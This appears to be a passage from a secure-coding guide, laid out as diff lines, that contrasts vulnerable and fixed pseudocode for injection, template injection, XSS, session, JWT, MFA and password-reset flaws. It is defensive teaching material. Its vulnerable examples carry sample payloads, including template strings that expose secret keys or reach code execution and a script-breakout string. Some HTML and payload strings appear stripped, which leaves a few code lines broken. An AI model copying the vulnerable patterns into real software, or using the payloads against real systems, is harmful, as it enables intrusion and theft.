THROW Error("Invalid characters in credentials") + END IF + + user = mongodb.collection("users").find_one({username: username}) + + IF user IS NULL: + RETURN FALSE + END IF + + // Compare password hash, not plaintext + RETURN bcrypt.verify(password, user.password_hash) +END FUNCTION + +// Sanitize any object to remove operators +FUNCTION sanitize_query(obj): + IF typeof(obj) != "object": + RETURN obj + END IF + + sanitized = {} + FOR key, value IN obj: + // Block all MongoDB operators + IF key.starts_with("$"): + CONTINUE // Skip operator keys + END IF + + IF typeof(value) == "object": + // Recursively sanitize, but block nested operators + IF has_operator_keys(value): + THROW Error("Query operators not allowed") + END IF + END IF + + sanitized[key] = value + END FOR + RETURN sanitized +END FUNCTION +``` + +### 2.6 Template Injection (SSTI) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input in template strings +// ======================================== +FUNCTION render_greeting(username): + // Vulnerable: User input treated as template code + template_string = "Hello, " + username + "!" 
+ RETURN template_engine.render_string(template_string) +END FUNCTION + +FUNCTION render_email(user_template, user_data): + // Dangerous: User-provided template + RETURN template_engine.render_string(user_template, user_data) +END FUNCTION + +// Attack: username = "{{config.SECRET_KEY}}" +// Result: Template engine evaluates and exposes secret key +// Attack: username = "{{''.__class__.__mro__[1].__subclasses__()}}" +// Result: Can achieve remote code execution in some engines + +// ======================================== +// GOOD: Use templates as data, not code +// ======================================== +FUNCTION render_greeting(username): + // Safe: User input passed as data to pre-defined template + template = template_engine.load("greeting.html") + RETURN template.render({username: escape_html(username)}) +END FUNCTION + +// greeting.html (static, not user-provided): +// Hello, {{ username }}!
+ +FUNCTION render_email_safe(template_name, user_data): + // Safe: Only allow pre-defined templates + allowed_templates = ["welcome", "reset_password", "notification"] + + IF template_name NOT IN allowed_templates: + THROW Error("Invalid template name") + END IF + + // Sanitize all user data + safe_data = {} + FOR key, value IN user_data: + safe_data[key] = escape_html(string(value)) + END FOR + + template = template_engine.load(template_name + ".html") + RETURN template.render(safe_data) +END FUNCTION + +// For user-customizable content, use a safe subset +FUNCTION render_user_content(content, context): + // context: map of variable name to value, supplied by the application + // Use a sandboxed/logic-less template engine + // or plain text with variable substitution only + allowed_vars = ["name", "date", "product"] + + result = content + FOR var_name IN allowed_vars: + placeholder = "{{" + var_name + "}}" + IF var_name IN context: + result = result.replace(placeholder, escape_html(context[var_name])) + END IF + END FOR + + // Remove any remaining template syntax + result = regex.replace(result, "\{\{.*?\}\}", "") + + RETURN result +END FUNCTION +``` + +--- + +## 3. Cross-Site Scripting (XSS) + +**CWE References:** CWE-79 (Improper Neutralization of Input During Web Page Generation), CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page) +**Severity:** Critical | **Related:** [[XSS-Vulnerabilities]] + +> **Risk:** XSS has the **highest failure rate (86%)** in AI-generated code. AI models are 2.74x more likely to produce XSS-vulnerable code than human developers. XSS enables session hijacking, account takeover, and data theft. AI frequently generates direct string concatenation into HTML without encoding. 
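
As a concrete illustration of the concatenation problem described in the risk note above, here is a minimal Python sketch. The function names and the `<h1>` wrapper are assumptions made for this example, not part of the original patterns; the sketch relies only on the standard library's `html.escape`.

```python
import html


def render_search_heading_unsafe(query: str) -> str:
    """Vulnerable: the query is concatenated into HTML without encoding."""
    return "<h1>Search results for: " + query + "</h1>"


def render_search_heading(query: str) -> str:
    """Safer: HTML-encode the query before placing it in the markup."""
    # html.escape encodes &, < and >; with quote=True it also encodes " and '
    safe_query = html.escape(query, quote=True)
    return "<h1>Search results for: " + safe_query + "</h1>"


if __name__ == "__main__":
    payload = "<script>alert(1)</script>"
    # The unsafe version returns the script tag intact
    print(render_search_heading_unsafe(payload))
    # prints: <h1>Search results for: &lt;script&gt;alert(1)&lt;/script&gt;</h1>
    print(render_search_heading(payload))
```

This covers the HTML body and quoted-attribute contexts only. JavaScript, URL, and CSS contexts need their own encoders, as section 3.5 discusses, and a templating engine with auto-escaping is usually preferable to manual encoding.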
+ +### 3.1 Reflected XSS (Echoing User Input) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: User input directly echoed in response +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Vulnerable: User input inserted directly into HTML + html = "

Search results for: " + query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Vulnerable: Error parameter reflected without encoding + RETURN "
" + error_message + "
" +END FUNCTION + +// Attack: /search?q= +// Result: Script executes in victim's browser, stealing their session + +// ======================================== +// GOOD: HTML-encode all user input before rendering +// ======================================== +FUNCTION handle_search(request): + query = request.get_parameter("q") + + // Safe: HTML-encode user input + safe_query = html_encode(query) + + html = "

Search results for: " + safe_query + "

" + html += "

No results found.

" + RETURN html_response(html) +END FUNCTION + +FUNCTION display_error(error_message): + // Safe: Encode before inserting into HTML + RETURN "
" + html_encode(error_message) + "
" +END FUNCTION + +// HTML encoding function +FUNCTION html_encode(input): + result = input + result = result.replace("&", "&amp;") // Must run first so later entities are not double-encoded + result = result.replace("<", "&lt;") + result = result.replace(">", "&gt;") + result = result.replace('"', "&quot;") + result = result.replace("'", "&#x27;") + RETURN result +END FUNCTION +``` + +### 3.2 Stored XSS (Database to Page Without Encoding) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Stored data rendered without encoding +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Vulnerable: Stored data rendered directly + html += "
" + html += "" + comment.author + "" + html += "

" + comment.text + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Vulnerable: User-controlled fields rendered directly + html = "

" + user.display_name + "

" + html += "
" + user.biography + "
" + RETURN html +END FUNCTION + +// Attack: Attacker saves comment with text: +// Result: Every user viewing the page executes attacker's script + +// ======================================== +// GOOD: Encode all database-sourced content +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Safe: All stored data is encoded + html += "
" + html += "" + html_encode(comment.author) + "" + html += "

" + html_encode(comment.text) + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Safe: Encode user-controlled fields + html = "

" + html_encode(user.display_name) + "

" + html += "
" + html_encode(user.biography) + "
" + RETURN html +END FUNCTION + +// Better: Use templating engine with auto-escaping +FUNCTION display_comments_template(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + // Templating engines like Jinja2, Handlebars auto-escape by default + RETURN template.render("comments.html", {comments: comments}) +END FUNCTION +``` + +### 3.3 DOM-Based XSS (innerHTML, document.write) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Dangerous DOM manipulation methods +// ======================================== +FUNCTION display_welcome_message(): + // Vulnerable: URL parameter into innerHTML + params = parse_url_parameters(window.location.search) + username = params.get("name") + + document.getElementById("welcome").innerHTML = + "Welcome, " + username + "!" +END FUNCTION + +FUNCTION update_content(user_content): + // Vulnerable: User content via innerHTML + document.getElementById("content").innerHTML = user_content +END FUNCTION + +FUNCTION load_dynamic_script(url): + // Dangerous: document.write with external content + document.write("") +END FUNCTION + +// Attack: ?name= +// Result: XSS via event handler, bypasses simple " + html += "" + + // Attacker-injected scripts without nonce will be blocked + RETURN html +END FUNCTION + +// CSP report-only mode for testing +FUNCTION configure_csp_reporting(): + server.set_header("Content-Security-Policy-Report-Only", + "default-src 'self'; report-uri /csp-report" + ) +END FUNCTION +``` + +### 3.5 Improper Output Encoding (Context-Specific) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Wrong encoding for context +// ======================================== +FUNCTION render_javascript_variable(user_input): + // Vulnerable: HTML encoding doesn't protect JavaScript context + safe_for_html = html_encode(user_input) + + script = "" + RETURN script +END FUNCTION 
+ +FUNCTION render_url_parameter(user_input): + // Vulnerable: No URL encoding + url = "https://example.com/page?data=" + user_input + RETURN "Link" +END FUNCTION + +FUNCTION render_css_value(user_color): + // Vulnerable: No CSS encoding + style = "
Text
" + RETURN style +END FUNCTION + +// Attack on JS context: User input = "'; alert(1); //'" +// Result: var userData = ''; alert(1); //''; - Script injection + +// ======================================== +// GOOD: Context-specific encoding +// ======================================== + +// JavaScript string context +FUNCTION js_encode(input): + result = input + result = result.replace("\\", "\\\\") + result = result.replace("'", "\\'") + result = result.replace('"', '\\"') + result = result.replace("\n", "\\n") + result = result.replace("\r", "\\r") + result = result.replace("<", "\\x3c") // Prevent breakout + result = result.replace(">", "\\x3e") + RETURN result +END FUNCTION + +FUNCTION render_javascript_variable(user_input): + // Safe: Proper JavaScript encoding + safe_for_js = js_encode(user_input) + + script = "" + RETURN script +END FUNCTION + +// Better: Use JSON encoding for complex data +FUNCTION render_javascript_data(user_data): + // Safest: JSON encoding handles all edge cases + json_data = json_encode(user_data) + + script = "" + RETURN script +END FUNCTION + +// URL context +FUNCTION render_url_parameter(user_input): + // Safe: URL encoding + encoded_param = url_encode(user_input) + url = "https://example.com/page?data=" + encoded_param + + // Also HTML-encode the entire URL for the href attribute + RETURN "Link" +END FUNCTION + +// CSS context +FUNCTION css_encode(input): + // Only allow safe CSS values + allowed_pattern = "^[a-zA-Z0-9#]+$" + IF NOT regex.match(allowed_pattern, input): + RETURN "inherit" // Safe default + END IF + RETURN input +END FUNCTION + +FUNCTION render_css_value(user_color): + // Safe: Validate and encode CSS value + safe_color = css_encode(user_color) + style = "
Text
" + RETURN style +END FUNCTION + +// HTML attribute context +FUNCTION render_attribute(attr_name, user_value): + // HTML-encode and quote attribute value + safe_value = html_encode(user_value) + RETURN attr_name + '="' + safe_value + '"' +END FUNCTION +``` + +--- + +## 4. Authentication and Session Management + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-521 (Weak Password Requirements), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-613 (Insufficient Session Expiration) +**Severity:** Critical | **Related:** [[Authentication-Failures]] + +> **Risk:** Authentication failures are a leading cause of data breaches. AI-generated code often implements weak password policies, insecure session handling, and vulnerable JWT patterns learned from outdated tutorials. Proper authentication requires defense in depth: strong credentials, secure sessions, rate limiting, and multi-factor authentication. + +### 4.1 Weak Password Requirements + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No or weak password validation +// ======================================== +FUNCTION register_user(username, password): + // Vulnerable: No password strength requirements + IF password.length < 4: + THROW Error("Password too short") + END IF + + // No checks for complexity, common passwords, or breaches + hash = simple_hash(password) // Often MD5 or SHA1 + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_weak(password): + // Vulnerable: Only checks length + RETURN password.length >= 6 +END FUNCTION + +// Problems: +// - Allows "123456", "password", "qwerty" +// - No complexity requirements +// - No check against breached password lists + +// ======================================== +// GOOD: Strong password policy with multiple checks +// ======================================== +FUNCTION 
register_user(username, password): + validation_result = validate_password_strength(password, username) + + IF NOT validation_result.is_valid: + THROW Error(validation_result.message) + END IF + + // Use strong hashing algorithm with salt + hash = bcrypt.hash(password, rounds=12) + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +// username is optional; when provided, the password may not contain it +FUNCTION validate_password_strength(password, username=NULL): + errors = [] + + // Minimum length (NIST recommends 8+, many use 12+) + IF password.length < 12: + errors.append("Password must be at least 12 characters") + END IF + + // Maximum length (prevent DoS via very long passwords) + IF password.length > 128: + errors.append("Password must not exceed 128 characters") + END IF + + // Check character diversity + has_upper = regex.search("[A-Z]", password) + has_lower = regex.search("[a-z]", password) + has_digit = regex.search("[0-9]", password) + has_special = regex.search("[!@#$%^&*(),.?\":{}|<>]", password) + + IF NOT (has_upper AND has_lower AND has_digit): + errors.append("Password must contain uppercase, lowercase, and numbers") + END IF + + // Check against common passwords list + IF is_common_password(password): + errors.append("Password is too common, choose a unique password") + END IF + + // Check against breached passwords (via k-Anonymity API) + IF is_breached_password(password): + errors.append("Password found in data breach, choose another") + END IF + + // Check for username in password + IF username IS NOT NULL AND password.lower().contains(username.lower()): + errors.append("Password cannot contain username") + END IF + + RETURN { + is_valid: errors.length == 0, + message: errors.join("; ") + } +END FUNCTION + +// Check breached passwords using k-Anonymity (e.g., HaveIBeenPwned API) +FUNCTION is_breached_password(password): + hash = sha1(password).upper() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send hash prefix to API (privacy-preserving) + response = http.get("https://api.pwnedpasswords.com/range/" 
+ prefix) + hashes = parse_pwned_response(response) + + RETURN suffix IN hashes +END FUNCTION +``` + +### 4.2 Missing Rate Limiting on Auth Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting on authentication +// ======================================== +FUNCTION login(username, password): + // Vulnerable: No limit on login attempts + user = database.find_user(username) + + IF user IS NULL: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + IF bcrypt.verify(password, user.password_hash): + RETURN {success: TRUE, token: generate_token(user)} + ELSE: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF +END FUNCTION + +// Problems: +// - Allows unlimited password guessing (brute force) +// - Allows credential stuffing attacks +// - No account lockout protection + +// ======================================== +// GOOD: Rate limiting with progressive delays +// ======================================== +FUNCTION login(username, password): + client_ip = request.get_client_ip() + + // Check IP-based rate limit (limits guessing from a single source, e.g. credential stuffing) + IF is_ip_rate_limited(client_ip): + log.warning("Rate limited IP attempted login", {ip: client_ip}) + RETURN {success: FALSE, error: "Too many attempts, try again later"} + END IF + + // Check account-based rate limit (protects one account from guesses spread across many IPs) + IF is_account_rate_limited(username): + log.warning("Rate limited account attempted login", {username: username}) + RETURN {success: FALSE, error: "Account temporarily locked"} + END IF + + user = database.find_user(username) + + // Always run bcrypt, even for unknown users, so response time does not reveal whether the account exists + // DUMMY_PASSWORD_HASH is a placeholder: a precomputed bcrypt hash of a random value + stored_hash = DUMMY_PASSWORD_HASH + IF user IS NOT NULL: + stored_hash = user.password_hash + END IF + password_ok = bcrypt.verify(password, stored_hash) + + IF user IS NULL OR NOT password_ok: + record_failed_attempt(username, client_ip) + // Generic error message (don't reveal if user exists) + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Successful login - reset counters + 
clear_failed_attempts(username, client_ip) + + RETURN {success: TRUE, token: generate_token(user)} +END FUNCTION + +// IP-based rate limiting +FUNCTION is_ip_rate_limited(ip): + key = "login_attempts:ip:" + ip + attempts = rate_limiter.get(key, default=0) + + // Allow 10 attempts per 15 minutes per IP + RETURN attempts >= 10 +END FUNCTION + +// Account-based rate limiting with progressive lockout +FUNCTION is_account_rate_limited(username): + key = "login_attempts:user:" + username + attempts = rate_limiter.get(key, default=0) + + // Progressive lockout: + // 5 attempts: 1 minute lockout + // 10 attempts: 5 minute lockout + // 15 attempts: 15 minute lockout + // 20+ attempts: 1 hour lockout + + IF attempts >= 20: + lockout_time = 3600 // 1 hour + ELSE IF attempts >= 15: + lockout_time = 900 // 15 minutes + ELSE IF attempts >= 10: + lockout_time = 300 // 5 minutes + ELSE IF attempts >= 5: + lockout_time = 60 // 1 minute + ELSE: + RETURN FALSE + END IF + + last_attempt = rate_limiter.get_timestamp(key) + RETURN (current_time() - last_attempt) < lockout_time +END FUNCTION + +FUNCTION record_failed_attempt(username, ip): + // Increment both counters with TTL + rate_limiter.increment("login_attempts:ip:" + ip, ttl=900) + rate_limiter.increment("login_attempts:user:" + username, ttl=3600) + + // Alert on suspicious patterns + ip_attempts = rate_limiter.get("login_attempts:ip:" + ip) + IF ip_attempts >= 50: + security_alert("Possible brute force attack from IP: " + ip) + END IF +END FUNCTION +``` + +### 4.3 Insecure Session Token Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable session tokens +// ======================================== +FUNCTION create_session_weak(user_id): + // Vulnerable: Predictable token based on user ID + token = "session_" + user_id + "_" + current_timestamp() + RETURN token +END FUNCTION + +FUNCTION create_session_sequential(): + // Vulnerable: 
Sequential/incremental tokens + GLOBAL session_counter + session_counter = session_counter + 1 + RETURN "session_" + session_counter +END FUNCTION + +FUNCTION create_session_weak_random(): + // Vulnerable: Using Math.random() or similar weak PRNG + token = "" + FOR i = 1 TO 32: + token = token + random_char() // Math.random() based + END FOR + RETURN token +END FUNCTION + +// Attack: Attacker can predict/enumerate session tokens +// - Timestamp-based: Try tokens from recent timestamps +// - Sequential: Try nearby session IDs +// - Weak random: Seed prediction or insufficient entropy + +// ======================================== +// GOOD: Cryptographically secure session tokens +// ======================================== +FUNCTION create_session(user_id): + // Generate cryptographically secure random token + // Use 256 bits (32 bytes) minimum for security + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) // URL-safe encoding + + // Store session with metadata + session_data = { + user_id: user_id, + created_at: current_timestamp(), + expires_at: current_timestamp() + SESSION_LIFETIME, + ip_address: request.get_client_ip(), + user_agent: request.get_user_agent() + } + + // Store hashed token (protect against database leaks) + token_hash = sha256(token) + session_store.set(token_hash, session_data) + + RETURN token +END FUNCTION + +FUNCTION validate_session(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + session = session_store.get(token_hash) + + IF session IS NULL: + RETURN NULL + END IF + + // Check expiration + IF current_timestamp() > session.expires_at: + session_store.delete(token_hash) + RETURN NULL + END IF + + // Optional: Validate IP/User-Agent consistency + IF session.ip_address != request.get_client_ip(): + log.warning("Session IP mismatch", { + expected: session.ip_address, + actual: request.get_client_ip() + }) + // Decide whether to invalidate or just log + 
END IF + + RETURN session +END FUNCTION + +// Secure cookie configuration +FUNCTION set_session_cookie(response, token): + response.set_cookie("session", token, { + httponly: TRUE, // Prevent JavaScript access + secure: TRUE, // HTTPS only + samesite: "Strict", // Prevent CSRF + max_age: SESSION_LIFETIME, + path: "/" + }) +END FUNCTION +``` + +### 4.4 Session Fixation Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Session ID not regenerated on login +// ======================================== +FUNCTION login_vulnerable(username, password): + // Session ID was set when user first visited (before login) + session_id = request.get_cookie("session_id") + + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // Vulnerable: Reusing pre-authentication session ID + session_store.set(session_id, {user_id: user.id, authenticated: TRUE}) + RETURN {success: TRUE} +END FUNCTION + +// Attack scenario: +// 1. Attacker visits site, gets session_id=ABC123 +// 2. Attacker sends victim link: https://site.com?session_id=ABC123 +// 3. Victim logs in with attacker's session ID +// 4. 
Attacker uses session_id=ABC123 to access victim's account + +// ======================================== +// GOOD: Regenerate session on authentication changes +// ======================================== +FUNCTION login_secure(username, password): + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // CRITICAL: Invalidate old session and create new one + old_session_id = request.get_cookie("session_id") + IF old_session_id IS NOT NULL: + session_store.delete(old_session_id) + END IF + + // Generate completely new session ID + new_session = create_session(user.id) + + // Set new session cookie + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN {success: TRUE} +END FUNCTION + +// Also regenerate session on privilege escalation +FUNCTION elevate_privileges(user, new_role): + // Invalidate current session + old_session_id = request.get_cookie("session_id") + session_store.delete(old_session_id) + + // Create new session with elevated privileges + new_session = create_session(user.id) + new_session.role = new_role + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session +END FUNCTION + +// Regenerate session periodically for long-lived sessions +FUNCTION check_session_rotation(session): + // Rotate session every 15 minutes for active users + IF current_timestamp() - session.created_at > 900: + new_session = create_session(session.user_id) + new_session.data = session.data // Preserve session data + + session_store.delete(session.id) + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session + END IF + + RETURN session +END FUNCTION +``` + +### 4.5 JWT Misuse (None Algorithm, Weak Secrets, Sensitive Data) + +``` +// PSEUDOCODE - Implement in your target language + +// 
======================================== +// BAD: Common JWT security mistakes +// ======================================== + +// Mistake 1: Not verifying algorithm (none algorithm attack) +FUNCTION verify_jwt_vulnerable(token): + // Vulnerable: Accepts whatever algorithm is in the header + decoded = jwt.decode(token, SECRET_KEY) // Attacker sets alg: "none" + RETURN decoded +END FUNCTION + +// Mistake 2: Weak or short secret key +CONSTANT JWT_SECRET = "secret123" // Easily brute-forced + +FUNCTION create_jwt_weak(user_id): + payload = {user_id: user_id, exp: current_time() + 86400} + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// Mistake 3: Sensitive data in payload (JWTs are base64, not encrypted!) +FUNCTION create_jwt_exposed(user): + payload = { + user_id: user.id, + email: user.email, + ssn: user.social_security_number, // PII in token! + credit_card: user.card_number, // Sensitive data exposed! + password_hash: user.password_hash, // Never put this in JWT! + exp: current_time() + 86400 + } + RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// Mistake 4: No expiration or very long expiration +FUNCTION create_jwt_no_expiry(user_id): + payload = {user_id: user_id} // No exp claim! 
+ RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// ======================================== +// GOOD: Secure JWT implementation +// ======================================== + +// Use a strong secret (256+ bits for HS256) +CONSTANT JWT_SECRET = environment.get("JWT_SECRET") // From secret manager + +FUNCTION initialize_jwt(): + // Validate secret strength at startup + IF JWT_SECRET IS NULL OR JWT_SECRET.length < 32: + THROW Error("JWT_SECRET must be at least 256 bits") + END IF +END FUNCTION + +FUNCTION create_jwt_secure(user_id, expiry=3600): + now = current_time() + user = database.get_user(user_id) // Needed for the role claim + + payload = { + // Standard claims + sub: user_id, // Subject + iat: now, // Issued at + exp: now + expiry, // Expiration (default 1 hour; keep access tokens short-lived) + nbf: now, // Not before + + // Custom claims (non-sensitive only!) + role: user.role // Roles are OK + // Never include: passwords, PII, payment info + } + + // Explicitly specify algorithm + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +FUNCTION verify_jwt_secure(token): + TRY: + // CRITICAL: Explicitly specify allowed algorithms + decoded = jwt.decode(token, JWT_SECRET, algorithms=["HS256"]) + + // Additional validation + IF decoded.exp < current_time(): + THROW Error("Token expired") + END IF + + IF decoded.nbf > current_time(): + THROW Error("Token not yet valid") + END IF + + RETURN decoded + + CATCH JWTError as e: + log.warning("JWT verification failed", {error: e.message}) + RETURN NULL + END TRY +END FUNCTION + +// For sensitive applications, use asymmetric keys (RS256) +FUNCTION create_jwt_asymmetric(user_id): + private_key = load_private_key("jwt_private.pem") + + payload = { + sub: user_id, + iat: current_time(), + exp: current_time() + 3600 + } + + // Sign with private key + RETURN jwt.encode(payload, private_key, algorithm="RS256") +END FUNCTION + +FUNCTION verify_jwt_asymmetric(token): + public_key = load_public_key("jwt_public.pem") + + // Verify with public key (can be shared safely) + RETURN jwt.decode(token, 
public_key, algorithms=["RS256"]) +END FUNCTION + +// Implement refresh token pattern for long-lived sessions +FUNCTION create_token_pair(user_id): + // Short-lived access token (15 minutes) + access_token = create_jwt_secure(user_id, expiry=900) + + // Long-lived refresh token (7 days) - store in DB for revocation + refresh_token = crypto.secure_random_bytes(32).to_base64() + database.insert("refresh_tokens", { + token_hash: sha256(refresh_token), + user_id: user_id, + expires_at: current_time() + 604800 + }) + + RETURN { + access_token: access_token, + refresh_token: refresh_token + } +END FUNCTION +``` + +### 4.6 Missing MFA Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Single-factor authentication only +// ======================================== +FUNCTION login_single_factor(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Immediately grant full access after password verification + token = create_session(user.id) + RETURN {success: TRUE, token: token} +END FUNCTION + +// Problems: +// - Compromised password = full account takeover +// - No protection against credential stuffing +// - Phishing attacks succeed completely +// - No step-up authentication for sensitive operations + +// ======================================== +// GOOD: MFA-aware authentication flow +// ======================================== +FUNCTION login_with_mfa(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Check if MFA is enabled + IF user.mfa_enabled: + // Create partial session (not fully authenticated) + partial_token = create_partial_session(user.id) + + RETURN { + success: FALSE, + mfa_required: TRUE, 
+ partial_token: partial_token, + mfa_methods: get_user_mfa_methods(user.id) + } + END IF + + // If MFA not enabled, encourage setup + token = create_session(user.id) + RETURN { + success: TRUE, + token: token, + mfa_suggestion: user.is_admin // Strongly suggest MFA for admins + } +END FUNCTION + +FUNCTION verify_mfa(partial_token, mfa_code, mfa_method): + session = get_partial_session(partial_token) + + IF session IS NULL OR session.expires_at < current_time(): + RETURN {success: FALSE, error: "Session expired, please login again"} + END IF + + user = database.get_user(session.user_id) + + // Verify MFA code based on method + is_valid = FALSE + + IF mfa_method == "totp": + is_valid = verify_totp(user.totp_secret, mfa_code) + ELSE IF mfa_method == "sms": + is_valid = verify_sms_code(user.id, mfa_code) + ELSE IF mfa_method == "backup": + is_valid = verify_backup_code(user.id, mfa_code) + END IF + + IF NOT is_valid: + record_failed_mfa_attempt(user.id) + RETURN {success: FALSE, error: "Invalid verification code"} + END IF + + // MFA verified - create full session + delete_partial_session(partial_token) + token = create_session(user.id) + + RETURN {success: TRUE, token: token} +END FUNCTION + +// TOTP verification with time window +FUNCTION verify_totp(secret, code): + // Allow 1 step before and after for clock drift (30 second windows) + FOR step IN [-1, 0, 1]: + expected = generate_totp(secret, time_step=step) + IF constant_time_compare(code, expected): + RETURN TRUE + END IF + END FOR + RETURN FALSE +END FUNCTION + +// Step-up authentication for sensitive operations +FUNCTION require_recent_auth(user_session, max_age_seconds): + IF current_time() - user_session.authenticated_at > max_age_seconds: + RETURN { + requires_reauth: TRUE, + message: "Please re-enter your password for this action" + } + END IF + RETURN {requires_reauth: FALSE} +END FUNCTION + +FUNCTION perform_sensitive_action(session, action, password): + // Require recent password entry for sensitive 
actions + user = database.get_user(session.user_id) + + IF NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid password"} + END IF + + // Update authentication timestamp + session.authenticated_at = current_time() + + // Perform the sensitive action + RETURN execute_action(action) +END FUNCTION +``` + +### 4.7 Insecure Password Reset Flows + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Insecure password reset implementations +// ======================================== + +// Mistake 1: Predictable reset tokens +FUNCTION create_reset_token_weak(user_id): + // Vulnerable: MD5 of user_id + timestamp is guessable + token = md5(user_id + current_timestamp()) + database.save_reset_token(user_id, token) + RETURN token +END FUNCTION + +// Mistake 2: Token never expires +FUNCTION request_password_reset_no_expiry(email): + user = database.find_user_by_email(email) + token = generate_token() + // Vulnerable: No expiration set + database.save_reset_token(user.id, token) + send_email(email, "Reset: " + BASE_URL + "/reset?token=" + token) +END FUNCTION + +// Mistake 3: Token not invalidated after use +FUNCTION reset_password_reusable(token, new_password): + user_id = database.get_user_by_reset_token(token) + user = database.get_user(user_id) + user.password_hash = hash(new_password) + database.save(user) + // Vulnerable: Token still valid, can be reused! +END FUNCTION + +// Mistake 4: User enumeration via different responses +FUNCTION request_reset_enumeration(email): + user = database.find_user_by_email(email) + IF user IS NULL: + RETURN {error: "No account found with this email"} // Reveals info! + END IF + // ... 
send reset email + RETURN {success: TRUE, message: "Reset email sent"} +END FUNCTION + +// Mistake 5: Sending password in email +FUNCTION reset_password_insecure(email): + user = database.find_user_by_email(email) + new_password = generate_random_password() + user.password_hash = hash(new_password) + // Vulnerable: Password in plaintext email + send_email(email, "Your new password is: " + new_password) +END FUNCTION + +// ======================================== +// GOOD: Secure password reset flow +// ======================================== +FUNCTION request_password_reset(email): + // Always return same response to prevent enumeration + user = database.find_user_by_email(email) + + IF user IS NOT NULL: + // Invalidate any existing reset tokens + database.delete_reset_tokens(user.id) + + // Generate cryptographically secure token + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) + + // Store hashed token with expiration + token_hash = sha256(token) + database.save_reset_token({ + user_id: user.id, + token_hash: token_hash, + expires_at: current_time() + 3600, // 1 hour expiration + created_at: current_time() + }) + + // Send reset email + reset_url = BASE_URL + "/reset-password?token=" + token + send_email(user.email, "password_reset", {reset_url: reset_url}) + + log.info("Password reset requested", {user_id: user.id}) + END IF + + // Same response whether user exists or not + RETURN { + success: TRUE, + message: "If an account exists, a reset email has been sent" + } +END FUNCTION + +FUNCTION validate_reset_token(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + reset_record = database.find_reset_token(token_hash) + + IF reset_record IS NULL: + log.warning("Invalid reset token attempted") + RETURN NULL + END IF + + // Check expiration + IF current_time() > reset_record.expires_at: + database.delete_reset_token(token_hash) + RETURN NULL + END IF + + RETURN reset_record 
